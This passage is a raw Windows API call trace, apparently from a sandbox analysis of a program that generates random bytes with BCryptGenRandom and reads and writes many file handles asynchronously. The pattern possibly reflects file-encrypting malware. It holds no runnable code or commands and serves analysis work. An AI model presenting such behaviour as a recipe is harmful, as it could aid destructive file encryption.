hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0194.094] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0194.103] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.104] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.104] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0194.104] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.104] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.104] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0194.104] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0194.104] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0194.104] free (_Block=0x3e305b8) [0194.104] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0194.104] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0194.105] free (_Block=0x1fa91d0) [0194.105] free (_Block=0x1fa2ed8) [0194.105] free (_Block=0x1fa90b8) [0194.105] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0194.107] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0194.115] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.115] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.115] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0194.115] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.116] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.116] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0194.116] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0194.116] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0194.116] free (_Block=0x3e305b8) [0194.116] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0194.116] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0194.116] free (_Block=0x1fa91d0) [0194.116] free (_Block=0x1fa2ed8) [0194.116] free (_Block=0x1fa90b8) [0194.116] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0194.119] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0194.127] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.127] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.127] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0194.127] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.128] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.128] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0194.128] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0194.128] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0194.128] free (_Block=0x3e305b8) [0194.128] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0194.128] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0194.128] free (_Block=0x1fa91d0) [0194.129] free (_Block=0x1fa2ed8) [0194.129] free (_Block=0x1fa90b8) [0194.129] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0194.135] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0194.142] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.143] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.143] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0194.143] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.143] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.143] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0194.143] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0194.144] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0194.144] free (_Block=0x3e305b8) [0194.144] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0194.144] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0194.144] free (_Block=0x1fa91d0) [0194.144] free (_Block=0x1fa2ed8) [0194.144] free (_Block=0x1fa90b8) [0194.144] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0194.147] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0194.223] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.223] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.223] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0194.223] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.224] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.224] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0194.224] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0194.224] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0194.224] free (_Block=0x3e305b8) [0194.235] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0194.235] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0194.246] free (_Block=0x1fa91d0) [0194.250] free (_Block=0x1fa2ed8) [0194.258] free (_Block=0x1fa90b8) [0194.259] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0194.269] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0194.269] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.270] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.270] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0194.270] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.270] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.270] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0194.271] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0194.271] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0194.271] free (_Block=0x3e305b8) [0194.271] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0194.271] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0194.271] free (_Block=0x1fa91d0) [0194.271] free (_Block=0x1fa2ed8) [0194.271] free (_Block=0x1fa90b8) [0194.271] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0194.272] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0194.273] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x4740, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0194.273] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0194.274] CloseHandle (hObject=0x308) returned 1 [0194.274] free (_Block=0x1ff1e60) [0194.274] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0194.282] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.282] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.282] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0194.282] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.282] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.282] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0194.283] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0194.283] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0194.283] free (_Block=0x3e305b8) [0194.283] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0194.283] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0194.283] free (_Block=0x1fa91d0) [0194.283] free (_Block=0x1fa2ed8) [0194.283] free (_Block=0x1fa90b8) [0194.283] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0194.283] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0194.286] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x48d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0194.286] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0194.313] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x6820, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0194.313] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0195.256] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x37d8a, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0195.260] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0195.275] CloseHandle (hObject=0x2a8) returned 1 [0195.275] free (_Block=0x3df0008) [0195.275] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0195.279] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x53af, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0195.280] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0195.294] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0195.298] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0195.313] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x6c8d, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0195.314] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0195.315] CloseHandle (hObject=0x308) returned 1 [0195.315] free (_Block=0x3df0008) [0195.315] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0195.328] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.329] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.329] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0195.329] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.330] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.330] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0195.330] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0195.330] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0195.330] free (_Block=0x3e305b8) [0195.330] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0195.330] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0195.330] free (_Block=0x1fa91d0) [0195.330] free (_Block=0x1fa2ed8) [0195.330] free (_Block=0x1fa90b8) [0195.330] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.331] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0195.332] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x6c90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.332] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0195.381] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x5c8c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0195.382] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0195.393] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xa14f, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0195.403] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0195.410] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.411] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0195.411] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.412] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0195.412] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0195.412] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0195.412] free (_Block=0x3e305b8) [0195.412] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0195.412] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0195.413] free (_Block=0x1fa91d0) [0195.413] free (_Block=0x1fa2ed8) [0195.413] free (_Block=0x1fa90b8) [0195.413] WriteFile (in: hFile=0x170, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0195.415] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0195.421] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x1fb90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0195.421] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0195.430] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.430] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.430] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0195.430] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.431] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.431] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0195.431] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0195.431] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0195.431] free (_Block=0x3e305b8) [0195.431] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0195.431] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0195.432] free (_Block=0x1fa91d0) [0195.432] free (_Block=0x1fa2ed8) [0195.432] free (_Block=0x1fa90b8) [0195.432] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.436] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0195.468] CloseHandle (hObject=0x170) returned 1 [0195.468] free (_Block=0x3f70048) [0195.468] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0195.471] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1b778, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0195.478] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0195.502] CloseHandle (hObject=0x170) returned 1 [0195.502] free (_Block=0x3d70450) [0195.502] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0195.511] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.511] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.511] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0195.511] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.512] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.512] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0195.512] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0195.512] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0195.512] free (_Block=0x3e305b8) [0195.512] calloc (_Count=0x41, 